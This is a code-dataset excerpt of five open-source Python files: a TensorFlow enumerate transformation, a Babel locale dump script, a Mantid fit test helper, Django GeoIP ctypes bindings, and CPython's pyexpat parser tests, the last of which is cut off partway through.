repo_name | path | copies | size | content | license |
---|---|---|---|---|---|
jalexvig/tensorflow | tensorflow/contrib/data/python/ops/enumerate_ops.py | 41 | 1984 |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Enumerate dataset transformations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import dtypes
def enumerate_dataset(start=0):
"""A transformation that enumerate the elements of a dataset.
It is Similar to python's `enumerate`.
For example:
```python
# NOTE: The following examples use `{ ... }` to represent the
# contents of a dataset.
a = { 1, 2, 3 }
b = { (7, 8), (9, 10) }
# The nested structure of the `datasets` argument determines the
# structure of elements in the resulting dataset.
a.apply(tf.contrib.data.enumerate(start=5)) == { (5, 1), (6, 2), (7, 3) }
b.apply(tf.contrib.data.enumerate()) == { (0, (7, 8)), (1, (9, 10)) }
```
Args:
start: A `tf.int64` scalar `tf.Tensor`, representing the start
value for enumeration.
Returns:
A `Dataset` transformation function, which can be passed to
@{tf.data.Dataset.apply}.
"""
def _apply_fn(dataset):
max_value = np.iinfo(dtypes.int64.as_numpy_dtype).max
return dataset_ops.Dataset.zip((dataset_ops.Dataset.range(start, max_value),
dataset))
return _apply_fn
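# Illustrative usage sketch (not part of the original module); assumes a TF 1.x
# runtime where `tf.contrib.data` transformations are applied via `Dataset.apply`:
#
#   ds = dataset_ops.Dataset.from_tensor_slices([1, 2, 3])
#   ds = ds.apply(enumerate_dataset(start=5))
#   # yields the elements (5, 1), (6, 2), (7, 3)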
| apache-2.0 |
x303597316/hue | desktop/core/ext-py/Babel-0.9.6/scripts/dump_data.py | 40 | 1551 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://babel.edgewall.org/wiki/License.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://babel.edgewall.org/log/.
from optparse import OptionParser
from pprint import pprint
import sys
from babel.localedata import load, LocaleDataDict
def main():
parser = OptionParser(usage='%prog [options] locale [path]')
parser.add_option('--noinherit', action='store_false', dest='inherit',
help='do not merge inherited data into locale data')
parser.add_option('--resolve', action='store_true', dest='resolve',
help='resolve aliases in locale data')
parser.set_defaults(inherit=True, resolve=False)
options, args = parser.parse_args()
if len(args) not in (1, 2):
parser.error('incorrect number of arguments')
data = load(args[0], merge_inherited=options.inherit)
if options.resolve:
data = LocaleDataDict(data)
if len(args) > 1:
for key in args[1].split('.'):
data = data[key]
if isinstance(data, dict):
data = dict(data.items())
pprint(data)
if __name__ == '__main__':
main()
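# Illustrative invocations (not part of the original script); the locale code
# and key path are examples only:
#
#   python dump_data.py en_US                    # pretty-print the full locale dict
#   python dump_data.py --resolve de languages   # print only the 'languages' subtree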
| apache-2.0 |
peterfpeterson/mantid | Framework/PythonInterface/test/python/plugins/functions/StretchedExpFTTestHelper.py | 3 | 4706 |
# Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source,
# Institut Laue - Langevin & CSNS, Institute of High Energy Physics, CAS
# SPDX - License - Identifier: GPL - 3.0 +
import numpy as np
from scipy import constants
from mantid.simpleapi import Fit, CreateWorkspace, SaveNexus, SaveAscii, EvaluateFunction
from mantid.api import mtd, FunctionFactory
planck_constant = constants.Planck/constants.e*1E15 # meV*psec
def createData(functor, startX=-0.1, endX=0.5, de=0.0004):
"""Generate data for the fit
:param startX: lower boundary for the data, in meV
:param endX: upper boundary for the data, in meV
:param de: energy bin, in meV
"""
energies = np.arange(startX, endX, de)
data = functor(energies)
background = 0.01*max(data)
data += background
errorBars = data*0.1
return CreateWorkspace(energies, data, errorBars, UnitX='DeltaE',
OutputWorkspace="data")
def cleanFit():
"""Removes workspaces created during the fit"""
mtd.remove('data')
mtd.remove('fit_NormalisedCovarianceMatrix')
mtd.remove('fit_Parameters')
mtd.remove('fit_Workspace')
def assertFit(workspace, tg):
"""
:param workspace: data MatrixHistogram
:param tg: dictionary of target fitting parameters
:return:
"""
unacceptable_chi_square = 1.0
msg = ""
for irow in range(workspace.rowCount()):
row = workspace.row(irow)
name = row['Name']
if name == "Cost function value":
chi_square = row['Value']
msg += " chi_square=" + str(chi_square)
elif name == "f0.Tau":
tauOptimal = row['Value']
msg += " tauOptimal=" + str(tauOptimal)
elif name == "f0.Beta":
betaOptimal = row['Value']
msg += " betaOptimal=" + str(betaOptimal)
elif name == "f0.Height":
heightOptimal = row['Value']
msg += " heightOptimal=" + str(heightOptimal)
cleanFit()
beta = tg['beta']
height = tg['height']
tau = tg['tau']
check = (chi_square < unacceptable_chi_square) and \
(abs(height - heightOptimal) / height < 0.01) and \
(abs(beta - betaOptimal) < 0.01) and \
(abs(tau - tauOptimal) / tau < 0.01)
return check, msg
def isregistered(function):
status, msg = True, ""
try:
FunctionFactory.createFunction(function)
except RuntimeError as exc:
status, msg = False, 'Could not create {} function: {}'.format(function, str(exc))
return status, msg
def do_fit(tg, fString, shape):
"""
Given a target shape and initial fit function guess, carry out the fit
:param tg: dictionary of target fitting parameters
:param fString: initial guess of the fit function
:param shape: Gaussian or Lorentzian, either integrated or not
:return: success or failure of the fit
"""
if 'Gaussian' in shape:
E0 = planck_constant / tg['tau']
# Analytical Fourier transform of exp(-(t/tau)**2)
functor = lambda E: np.sqrt(np.pi) / E0 * np.exp(-(np.pi*E/E0) ** 2)
elif 'Lorentzian' in shape:
hwhm = planck_constant / (2 * np.pi * tg['tau'])
# Analytical Fourier transform of exp(-t/tau)
functor = lambda E: (1.0 / np.pi) * hwhm / (hwhm ** 2 + E ** 2)
if 'Integrated' in shape:
# when testing function PrimStretchedExpFT
def ifunctor(E):
"""Numerical integral of the functor within each energy bin"""
de = (E[-1]-E[0]) / (len(E)-1.0) # energy spacing
rf = 100 # make the energy domain a grid 100 times finer
efine = np.arange(E[0]-de, E[-1]+2*de, de/rf)
values = functor(efine) # evaluate on the finer grid
primitive = np.cumsum(values) / rf # cumulative sum, giving the integral
# bb are bin boundaries delimiting bins of width de and centered at the E values
bb = (E[1:] + E[:-1]) / 2 # internal bin boundaries
bb = np.insert(bb, 0, 2 * E[0] - bb[0]) # external lower bin boundary
bb = np.append(bb, 2 * E[-1] - bb[-1]) # external upper bin boundary
# return the integral over each energy bin
return np.interp(bb[1:], efine, primitive) - np.interp(bb[:-1], efine, primitive)
createData(ifunctor)
else:
# when testing function StretchedExpFT
createData(functor) # Create workspace "data"
Fit(Function=fString, InputWorkspace="data", MaxIterations=100, Output="fit")
return assertFit(mtd["fit_Parameters"], tg)
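# Illustrative usage sketch (not part of the original helper). The fit-function
# string below is an assumption of how an initial StretchedExpFT guess might be
# written; the real tests construct their own targets and strings.
#
#   target = {'tau': 20.0, 'beta': 1.0, 'height': 1.0}
#   guess = ("name=StretchedExpFT,Height=0.1,Tau=10,Beta=1.2,Centre=0;"
#            "name=FlatBackground,A0=0")
#   passed, details = do_fit(target, guess, 'Lorentzian')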
| gpl-3.0 |
aisipos/django | django/contrib/gis/geoip/prototypes.py | 535 | 3943 |
from ctypes import POINTER, Structure, c_char_p, c_float, c_int, string_at
from django.contrib.gis.geoip.libgeoip import free, lgeoip
# #### GeoIP C Structure definitions ####
class GeoIPRecord(Structure):
_fields_ = [('country_code', c_char_p),
('country_code3', c_char_p),
('country_name', c_char_p),
('region', c_char_p),
('city', c_char_p),
('postal_code', c_char_p),
('latitude', c_float),
('longitude', c_float),
# TODO: In 1.4.6 this changed from `int dma_code;` to
# `union {int metro_code; int dma_code;};`. Change
# to a `ctypes.Union` in order to accommodate this in the future when
# pre-1.4.6 versions are no longer distributed.
('dma_code', c_int),
('area_code', c_int),
('charset', c_int),
('continent_code', c_char_p),
]
geoip_char_fields = [name for name, ctype in GeoIPRecord._fields_ if ctype is c_char_p]
GEOIP_DEFAULT_ENCODING = 'iso-8859-1'
geoip_encodings = {
0: 'iso-8859-1',
1: 'utf8',
}
class GeoIPTag(Structure):
pass
RECTYPE = POINTER(GeoIPRecord)
DBTYPE = POINTER(GeoIPTag)
# #### ctypes function prototypes ####
# GeoIP_lib_version appeared in version 1.4.7.
if hasattr(lgeoip, 'GeoIP_lib_version'):
GeoIP_lib_version = lgeoip.GeoIP_lib_version
GeoIP_lib_version.argtypes = None
GeoIP_lib_version.restype = c_char_p
else:
GeoIP_lib_version = None
# For freeing memory allocated within a record
GeoIPRecord_delete = lgeoip.GeoIPRecord_delete
GeoIPRecord_delete.argtypes = [RECTYPE]
GeoIPRecord_delete.restype = None
# For retrieving records by name or address.
def check_record(result, func, cargs):
if result:
# Checking the pointer to the C structure, if valid pull out elements
# into a dictionary.
rec = result.contents
record = {fld: getattr(rec, fld) for fld, ctype in rec._fields_}
# Now converting the strings to unicode using the proper encoding.
encoding = geoip_encodings[record['charset']]
for char_field in geoip_char_fields:
if record[char_field]:
record[char_field] = record[char_field].decode(encoding)
# Free the memory allocated for the struct & return.
GeoIPRecord_delete(result)
return record
else:
return None
def record_output(func):
func.argtypes = [DBTYPE, c_char_p]
func.restype = RECTYPE
func.errcheck = check_record
return func
GeoIP_record_by_addr = record_output(lgeoip.GeoIP_record_by_addr)
GeoIP_record_by_name = record_output(lgeoip.GeoIP_record_by_name)
# For opening & closing GeoIP database files.
GeoIP_open = lgeoip.GeoIP_open
GeoIP_open.restype = DBTYPE
GeoIP_delete = lgeoip.GeoIP_delete
GeoIP_delete.argtypes = [DBTYPE]
GeoIP_delete.restype = None
# This is so the string pointer can be freed within Python.
class geoip_char_p(c_char_p):
pass
def check_string(result, func, cargs):
if result:
s = string_at(result)
free(result)
else:
s = ''
return s.decode(GEOIP_DEFAULT_ENCODING)
GeoIP_database_info = lgeoip.GeoIP_database_info
GeoIP_database_info.restype = geoip_char_p
GeoIP_database_info.errcheck = check_string
# String output routines.
def string_output(func):
def _err_check(result, func, cargs):
if result:
return result.decode(GEOIP_DEFAULT_ENCODING)
return result
func.restype = c_char_p
func.errcheck = _err_check
return func
GeoIP_country_code_by_addr = string_output(lgeoip.GeoIP_country_code_by_addr)
GeoIP_country_code_by_name = string_output(lgeoip.GeoIP_country_code_by_name)
GeoIP_country_name_by_addr = string_output(lgeoip.GeoIP_country_name_by_addr)
GeoIP_country_name_by_name = string_output(lgeoip.GeoIP_country_name_by_name)
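# Illustrative usage sketch (not part of the original module); the database
# path is a placeholder (flag 0 corresponds to GEOIP_STANDARD):
#
#   db = GeoIP_open(b'/path/to/GeoIPCity.dat', 0)
#   record = GeoIP_record_by_name(db, b'www.example.com')  # dict or None
#   GeoIP_delete(db)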
| bsd-3-clause |
munyirik/python | cpython/Lib/test/test_pyexpat.py | 6 | 26058 |
# XXX TypeErrors on calling handlers, or on bad return values from a
# handler, are obscure and unhelpful.
from io import BytesIO
import os
import sysconfig
import unittest
import traceback
from xml.parsers import expat
from xml.parsers.expat import errors
from test.support import sortdict
class SetAttributeTest(unittest.TestCase):
def setUp(self):
self.parser = expat.ParserCreate(namespace_separator='!')
self.set_get_pairs = [
[0, 0],
[1, 1],
[2, 1],
[0, 0],
]
def test_ordered_attributes(self):
for x, y in self.set_get_pairs:
self.parser.ordered_attributes = x
self.assertEqual(self.parser.ordered_attributes, y)
def test_specified_attributes(self):
for x, y in self.set_get_pairs:
self.parser.specified_attributes = x
self.assertEqual(self.parser.specified_attributes, y)
data = b'''\
<?xml version="1.0" encoding="iso-8859-1" standalone="no"?>
<?xml-stylesheet href="stylesheet.css"?>
<!-- comment data -->
<!DOCTYPE quotations SYSTEM "quotations.dtd" [
<!ELEMENT root ANY>
<!ATTLIST root attr1 CDATA #REQUIRED attr2 CDATA #IMPLIED>
<!NOTATION notation SYSTEM "notation.jpeg">
<!ENTITY acirc "â">
<!ENTITY external_entity SYSTEM "entity.file">
<!ENTITY unparsed_entity SYSTEM "entity.file" NDATA notation>
%unparsed_entity;
]>
<root attr1="value1" attr2="value2ὀ">
<myns:subelement xmlns:myns="http://www.python.org/namespace">
Contents of subelements
</myns:subelement>
<sub2><![CDATA[contents of CDATA section]]></sub2>
&external_entity;
&skipped_entity;
\xb5
</root>
'''
# Produce UTF-8 output
class ParseTest(unittest.TestCase):
class Outputter:
def __init__(self):
self.out = []
def StartElementHandler(self, name, attrs):
self.out.append('Start element: ' + repr(name) + ' ' +
sortdict(attrs))
def EndElementHandler(self, name):
self.out.append('End element: ' + repr(name))
def CharacterDataHandler(self, data):
data = data.strip()
if data:
self.out.append('Character data: ' + repr(data))
def ProcessingInstructionHandler(self, target, data):
self.out.append('PI: ' + repr(target) + ' ' + repr(data))
def StartNamespaceDeclHandler(self, prefix, uri):
self.out.append('NS decl: ' + repr(prefix) + ' ' + repr(uri))
def EndNamespaceDeclHandler(self, prefix):
self.out.append('End of NS decl: ' + repr(prefix))
def StartCdataSectionHandler(self):
self.out.append('Start of CDATA section')
def EndCdataSectionHandler(self):
self.out.append('End of CDATA section')
def CommentHandler(self, text):
self.out.append('Comment: ' + repr(text))
def NotationDeclHandler(self, *args):
name, base, sysid, pubid = args
self.out.append('Notation declared: %s' %(args,))
def UnparsedEntityDeclHandler(self, *args):
entityName, base, systemId, publicId, notationName = args
self.out.append('Unparsed entity decl: %s' %(args,))
def NotStandaloneHandler(self):
self.out.append('Not standalone')
return 1
def ExternalEntityRefHandler(self, *args):
context, base, sysId, pubId = args
self.out.append('External entity ref: %s' %(args[1:],))
return 1
def StartDoctypeDeclHandler(self, *args):
self.out.append(('Start doctype', args))
return 1
def EndDoctypeDeclHandler(self):
self.out.append("End doctype")
return 1
def EntityDeclHandler(self, *args):
self.out.append(('Entity declaration', args))
return 1
def XmlDeclHandler(self, *args):
self.out.append(('XML declaration', args))
return 1
def ElementDeclHandler(self, *args):
self.out.append(('Element declaration', args))
return 1
def AttlistDeclHandler(self, *args):
self.out.append(('Attribute list declaration', args))
return 1
def SkippedEntityHandler(self, *args):
self.out.append(("Skipped entity", args))
return 1
def DefaultHandler(self, userData):
pass
def DefaultHandlerExpand(self, userData):
pass
handler_names = [
'StartElementHandler', 'EndElementHandler', 'CharacterDataHandler',
'ProcessingInstructionHandler', 'UnparsedEntityDeclHandler',
'NotationDeclHandler', 'StartNamespaceDeclHandler',
'EndNamespaceDeclHandler', 'CommentHandler',
'StartCdataSectionHandler', 'EndCdataSectionHandler', 'DefaultHandler',
'DefaultHandlerExpand', 'NotStandaloneHandler',
'ExternalEntityRefHandler', 'StartDoctypeDeclHandler',
'EndDoctypeDeclHandler', 'EntityDeclHandler', 'XmlDeclHandler',
'ElementDeclHandler', 'AttlistDeclHandler', 'SkippedEntityHandler',
]
def _hookup_callbacks(self, parser, handler):
"""
Set each of the callbacks defined on handler and named in
self.handler_names on the given parser.
"""
for name in self.handler_names:
setattr(parser, name, getattr(handler, name))
def _verify_parse_output(self, operations):
expected_operations = [
('XML declaration', ('1.0', 'iso-8859-1', 0)),
'PI: \'xml-stylesheet\' \'href="stylesheet.css"\'',
"Comment: ' comment data '",
"Not standalone",
("Start doctype", ('quotations', 'quotations.dtd', None, 1)),
('Element declaration', ('root', (2, 0, None, ()))),
('Attribute list declaration', ('root', 'attr1', 'CDATA', None,
1)),
('Attribute list declaration', ('root', 'attr2', 'CDATA', None,
0)),
"Notation declared: ('notation', None, 'notation.jpeg', None)",
('Entity declaration', ('acirc', 0, '\xe2', None, None, None, None)),
('Entity declaration', ('external_entity', 0, None, None,
'entity.file', None, None)),
"Unparsed entity decl: ('unparsed_entity', None, 'entity.file', None, 'notation')",
"Not standalone",
"End doctype",
"Start element: 'root' {'attr1': 'value1', 'attr2': 'value2\u1f40'}",
"NS decl: 'myns' 'http://www.python.org/namespace'",
"Start element: 'http://www.python.org/namespace!subelement' {}",
"Character data: 'Contents of subelements'",
"End element: 'http://www.python.org/namespace!subelement'",
"End of NS decl: 'myns'",
"Start element: 'sub2' {}",
'Start of CDATA section',
"Character data: 'contents of CDATA section'",
'End of CDATA section',
"End element: 'sub2'",
"External entity ref: (None, 'entity.file', None)",
('Skipped entity', ('skipped_entity', 0)),
"Character data: '\xb5'",
"End element: 'root'",
]
for operation, expected_operation in zip(operations, expected_operations):
self.assertEqual(operation, expected_operation)
def test_parse_bytes(self):
out = self.Outputter()
parser = expat.ParserCreate(namespace_separator='!')
self._hookup_callbacks(parser, out)
parser.Parse(data, 1)
operations = out.out
self._verify_parse_output(operations)
# Issue #6697.
self.assertRaises(AttributeError, getattr, parser, '\uD800')
def test_parse_str(self):
out = self.Outputter()
parser = expat.ParserCreate(namespace_separator='!')
self._hookup_callbacks(parser, out)
parser.Parse(data.decode('iso-8859-1'), 1)
operations = out.out
self._verify_parse_output(operations)
def test_parse_file(self):
# Try parsing a file
out = self.Outputter()
parser = expat.ParserCreate(namespace_separator='!')
self._hookup_callbacks(parser, out)
file = BytesIO(data)
parser.ParseFile(file)
operations = out.out
self._verify_parse_output(operations)
def test_parse_again(self):
parser = expat.ParserCreate()
file = BytesIO(data)
parser.ParseFile(file)
# Issue 6676: ensure a meaningful exception is raised when attempting
# to parse more than one XML document per xmlparser instance,
# a limitation of the Expat library.
with self.assertRaises(expat.error) as cm:
parser.ParseFile(file)
self.assertEqual(expat.ErrorString(cm.exception.code),
expat.errors.XML_ERROR_FINISHED)
class NamespaceSeparatorTest(unittest.TestCase):
def test_legal(self):
# Tests that make sure we get errors when the namespace_separator value
# is illegal, and that we don't for good values:
expat.ParserCreate()
expat.ParserCreate(namespace_separator=None)
expat.ParserCreate(namespace_separator=' ')
def test_illegal(self):
try:
expat.ParserCreate(namespace_separator=42)
self.fail()
except TypeError as e:
self.assertEqual(str(e),
'ParserCreate() argument 2 must be str or None, not int')
try:
expat.ParserCreate(namespace_separator='too long')
self.fail()
except ValueError as e:
self.assertEqual(str(e),
'namespace_separator must be at most one character, omitted, or None')
def test_zero_length(self):
# ParserCreate() needs to accept a namespace_separator of zero length
# to satisfy the requirements of RDF applications that are required
# to simply glue together the namespace URI and the localname. Though
# considered a wart of the RDF specifications, it needs to be supported.
#
# See XML-SIG mailing list thread starting with
# http://mail.python.org/pipermail/xml-sig/2001-April/005202.html
#
expat.ParserCreate(namespace_separator='') # too short
class InterningTest(unittest.TestCase):
def test(self):
# Test the interning machinery.
p = expat.ParserCreate()
L = []
def collector(name, *args):
L.append(name)
p.StartElementHandler = collector
p.EndElementHandler = collector
p.Parse(b"<e> <e/> <e></e> </e>", 1)
tag = L[0]
self.assertEqual(len(L), 6)
for entry in L:
# L should have the same string repeated over and over.
self.assertTrue(tag is entry)
def test_issue9402(self):
# create an ExternalEntityParserCreate with buffer text
class ExternalOutputter:
def __init__(self, parser):
self.parser = parser
self.parser_result = None
def ExternalEntityRefHandler(self, context, base, sysId, pubId):
external_parser = self.parser.ExternalEntityParserCreate("")
self.parser_result = external_parser.Parse(b"", 1)
return 1
parser = expat.ParserCreate(namespace_separator='!')
parser.buffer_text = 1
out = ExternalOutputter(parser)
parser.ExternalEntityRefHandler = out.ExternalEntityRefHandler
parser.Parse(data, 1)
self.assertEqual(out.parser_result, 1)
class BufferTextTest(unittest.TestCase):
def setUp(self):
self.stuff = []
self.parser = expat.ParserCreate()
self.parser.buffer_text = 1
self.parser.CharacterDataHandler = self.CharacterDataHandler
def check(self, expected, label):
self.assertEqual(self.stuff, expected,
"%s\nstuff = %r\nexpected = %r"
% (label, self.stuff, map(str, expected)))
def CharacterDataHandler(self, text):
self.stuff.append(text)
def StartElementHandler(self, name, attrs):
self.stuff.append("<%s>" % name)
bt = attrs.get("buffer-text")
if bt == "yes":
self.parser.buffer_text = 1
elif bt == "no":
self.parser.buffer_text = 0
def EndElementHandler(self, name):
self.stuff.append("</%s>" % name)
def CommentHandler(self, data):
self.stuff.append("<!--%s-->" % data)
def setHandlers(self, handlers=[]):
for name in handlers:
setattr(self.parser, name, getattr(self, name))
def test_default_to_disabled(self):
parser = expat.ParserCreate()
self.assertFalse(parser.buffer_text)
def test_buffering_enabled(self):
# Make sure buffering is turned on
self.assertTrue(self.parser.buffer_text)
self.parser.Parse(b"<a>1<b/>2<c/>3</a>", 1)
self.assertEqual(self.stuff, ['123'],
"buffered text not properly collapsed")
def test1(self):
# XXX This test exposes more detail of Expat's text chunking than we
# XXX like, but it tests what we need to concisely.
self.setHandlers(["StartElementHandler"])
self.parser.Parse(b"<a>1<b buffer-text='no'/>2\n3<c buffer-text='yes'/>4\n5</a>", 1)
self.assertEqual(self.stuff,
["<a>", "1", "<b>", "2", "\n", "3", "<c>", "4\n5"],
"buffering control not reacting as expected")
def test2(self):
self.parser.Parse(b"<a>1<b/><2><c/> \n 3</a>", 1)
self.assertEqual(self.stuff, ["1<2> \n 3"],
"buffered text not properly collapsed")
def test3(self):
self.setHandlers(["StartElementHandler"])
self.parser.Parse(b"<a>1<b/>2<c/>3</a>", 1)
self.assertEqual(self.stuff, ["<a>", "1", "<b>", "2", "<c>", "3"],
"buffered text not properly split")
def test4(self):
self.setHandlers(["StartElementHandler", "EndElementHandler"])
self.parser.CharacterDataHandler = None
self.parser.Parse(b"<a>1<b/>2<c/>3</a>", 1)
self.assertEqual(self.stuff,
["<a>", "<b>", "</b>", "<c>", "</c>", "</a>"])
def test5(self):
self.setHandlers(["StartElementHandler", "EndElementHandler"])
self.parser.Parse(b"<a>1<b></b>2<c/>3</a>", 1)
self.assertEqual(self.stuff,
["<a>", "1", "<b>", "</b>", "2", "<c>", "</c>", "3", "</a>"])
def test6(self):
self.setHandlers(["CommentHandler", "EndElementHandler",
"StartElementHandler"])
self.parser.Parse(b"<a>1<b/>2<c></c>345</a> ", 1)
self.assertEqual(self.stuff,
["<a>", "1", "<b>", "</b>", "2", "<c>", "</c>", "345", "</a>"],
"buffered text not properly split")
def test7(self):
self.setHandlers(["CommentHandler", "EndElementHandler",
"StartElementHandler"])
self.parser.Parse(b"<a>1<b/>2<c></c>3<!--abc-->4<!--def-->5</a> ", 1)
self.assertEqual(self.stuff,
["<a>", "1", "<b>", "</b>", "2", "<c>", "</c>", "3",
"<!--abc-->", "4", "<!--def-->", "5", "</a>"],
"buffered text not properly split")
# Test handling of exception from callback:
class HandlerExceptionTest(unittest.TestCase):
def StartElementHandler(self, name, attrs):
raise RuntimeError(name)
def check_traceback_entry(self, entry, filename, funcname):
self.assertEqual(os.path.basename(entry[0]), filename)
self.assertEqual(entry[2], funcname)
def test_exception(self):
parser = expat.ParserCreate()
parser.StartElementHandler = self.StartElementHandler
try:
parser.Parse(b"<a><b><c/></b></a>", 1)
self.fail()
except RuntimeError as e:
self.assertEqual(e.args[0], 'a',
"Expected RuntimeError for element 'a', but" + \
" found %r" % e.args[0])
# Check that the traceback contains the relevant line in pyexpat.c
entries = traceback.extract_tb(e.__traceback__)
self.assertEqual(len(entries), 3)
self.check_traceback_entry(entries[0],
"test_pyexpat.py", "test_exception")
self.check_traceback_entry(entries[1],
"pyexpat.c", "StartElement")
self.check_traceback_entry(entries[2],
"test_pyexpat.py", "StartElementHandler")
if sysconfig.is_python_build():
self.assertIn('call_with_frame("StartElement"', entries[1][3])
# Test Current* members:
class PositionTest(unittest.TestCase):
def StartElementHandler(self, name, attrs):
self.check_pos('s')
def EndElementHandler(self, name):
self.check_pos('e')
def check_pos(self, event):
pos = (event,
self.parser.CurrentByteIndex,
self.parser.CurrentLineNumber,
self.parser.CurrentColumnNumber)
self.assertTrue(self.upto < len(self.expected_list),
'too many parser events')
expected = self.expected_list[self.upto]
self.assertEqual(pos, expected,
'Expected position %s, got position %s' % (expected, pos))
self.upto += 1
def test(self):
self.parser = expat.ParserCreate()
self.parser.StartElementHandler = self.StartElementHandler
self.parser.EndElementHandler = self.EndElementHandler
self.upto = 0
self.expected_list = [('s', 0, 1, 0), ('s', 5, 2, 1), ('s', 11, 3, 2),
('e', 15, 3, 6), ('e', 17, 4, 1), ('e', 22, 5, 0)]
xml = b'<a>\n <b>\n <c/>\n </b>\n</a>'
self.parser.Parse(xml, 1)
class sf1296433Test(unittest.TestCase):
def test_parse_only_xml_data(self):
# http://python.org/sf/1296433
#
xml = "<?xml version='1.0' encoding='iso8859'?><s>%s</s>" % ('a' * 1025)
# this one doesn't crash
#xml = "<?xml version='1.0'?><s>%s</s>" % ('a' * 10000)
class SpecificException(Exception):
pass
def handler(text):
raise SpecificException
parser = expat.ParserCreate()
parser.CharacterDataHandler = handler
self.assertRaises(Exception, parser.Parse, xml.encode('iso8859'))
class ChardataBufferTest(unittest.TestCase):
"""
test setting of chardata buffer size
"""
def test_1025_bytes(self):
self.assertEqual(self.small_buffer_test(1025), 2)
def test_1000_bytes(self):
self.assertEqual(self.small_buffer_test(1000), 1)
def test_wrong_size(self):
parser = expat.ParserCreate()
parser.buffer_text = 1
def f(size):
parser.buffer_size = size
self.assertRaises(ValueError, f, -1)
self.assertRaises(ValueError, f, 0)
def test_unchanged_size(self):
xml1 = b"<?xml version='1.0' encoding='iso8859'?><s>" + b'a' * 512
xml2 = b'a'*512 + b'</s>'
parser = expat.ParserCreate()
parser.CharacterDataHandler = self.counting_handler
parser.buffer_size = 512
parser.buffer_text = 1
# Feed 512 bytes of character data: the handler should be called
# once.
self.n = 0
parser.Parse(xml1)
self.assertEqual(self.n, 1)
# Reassign to buffer_size, but assign the same size.
parser.buffer_size = parser.buffer_size
self.assertEqual(self.n, 1)
# Try parsing rest of the document
parser.Parse(xml2)
self.assertEqual(self.n, 2)
def test_disabling_buffer(self):
xml1 = b"<?xml version='1.0' encoding='iso8859'?><a>" + b'a' * 512
xml2 = b'b' * 1024
xml3 = b'c' * 1024 + b'</a>';
parser = expat.ParserCreate()
parser.CharacterDataHandler = self.counting_handler
parser.buffer_text = 1
parser.buffer_size = 1024
self.assertEqual(parser.buffer_size, 1024)
# Parse one chunk of XML
self.n = 0
parser.Parse(xml1, 0)
self.assertEqual(parser.buffer_size, 1024)
self.assertEqual(self.n, 1)
# Turn off buffering and parse the next chunk.
parser.buffer_text = 0
self.assertFalse(parser.buffer_text)
self.assertEqual(parser.buffer_size, 1024)
for i in range(10):
parser.Parse(xml2, 0)
self.assertEqual(self.n, 11)
parser.buffer_text = 1
self.assertTrue(parser.buffer_text)
self.assertEqual(parser.buffer_size, 1024)
parser.Parse(xml3, 1)
self.assertEqual(self.n, 12)
def counting_handler(self, text):
self.n += 1
def small_buffer_test(self, buffer_len):
xml = b"<?xml version='1.0' encoding='iso8859'?><s>" + b'a' * buffer_len + b'</s>'
parser = expat.ParserCreate()
parser.CharacterDataHandler = self.counting_handler
parser.buffer_size = 1024
parser.buffer_text = 1
self.n = 0
parser.Parse(xml)
return self.n
def test_change_size_1(self):
xml1 = b"<?xml version='1.0' encoding='iso8859'?><a><s>" + b'a' * 1024
xml2 = b'aaa</s><s>' + b'a' * 1025 + b'</s></a>'
parser = expat.ParserCreate()
parser.CharacterDataHandler = self.counting_handler
parser.buffer_text = 1
parser.buffer_size = 1024
self.assertEqual(parser.buffer_size, 1024)
self.n = 0
parser.Parse(xml1, 0)
parser.buffer_size *= 2
self.assertEqual(parser.buffer_size, 2048)
parser.Parse(xml2, 1)
self.assertEqual(self.n, 2)
def test_change_size_2(self):
xml1 = b"<?xml version='1.0' encoding='iso8859'?><a>a<s>" + b'a' * 1023
xml2 = b'aaa</s><s>' + b'a' * 1025 + b'</s></a>'
parser = expat.ParserCreate()
parser.CharacterDataHandler = self.counting_handler
parser.buffer_text = 1
parser.buffer_size = 2048
self.assertEqual(parser.buffer_size, 2048)
self.n=0
parser.Parse(xml1, 0)
parser.buffer_size = parser.buffer_size // 2
self.assertEqual(parser.buffer_size, 1024)
parser.Parse(xml2, 1)
self.assertEqual(self.n, 4)
class MalformedInputTest(unittest.TestCase):
def test1(self):
xml = b"\0\r\n"
parser = expat.ParserCreate()
try:
parser.Parse(xml, True)
self.fail()
except expat.ExpatError as e:
self.assertEqual(str(e), 'unclosed token: line 2, column 0')
def test2(self):
# \xc2\x85 is UTF-8 encoded U+0085 (NEXT LINE)
xml = b"<?xml version\xc2\x85='1.0'?>\r\n"
parser = expat.ParserCreate()
try:
parser.Parse(xml, True)
self.fail()
except expat.ExpatError as e:
self.assertEqual(str(e), 'XML declaration not well-formed: line 1, column 14')
class ErrorMessageTest(unittest.TestCase):
def test_codes(self):
# verify mapping of errors.codes and errors.messages
self.assertEqual(errors.XML_ERROR_SYNTAX,
errors.messages[errors.codes[errors.XML_ERROR_SYNTAX]])
def test_expaterror(self):
xml = b'<'
parser = expat.ParserCreate()
try:
parser.Parse(xml, True)
self.fail()
except expat.ExpatError as e:
self.assertEqual(e.code,
errors.codes[errors.XML_ERROR_UNCLOSED_TOKEN])
class ForeignDTDTests(unittest.TestCase):
"""
Tests for the UseForeignDTD method of expat parser objects.
"""
def test_use_foreign_dtd(self):
"""
If UseForeignDTD is passed True and a document without an external
entity reference is parsed, ExternalEntityRefHandler is first called
with None for the public and system ids.
"""
handler_call_args = []
def resolve_entity(context, base, system_id, public_id):
handler_call_args.append((public_id, system_id))
return 1
parser = expat.ParserCreate()
parser.UseForeignDTD(True)
parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)
parser.ExternalEntityRefHandler = resolve_entity
parser.Parse(b"<?xml version='1.0'?><element/>")
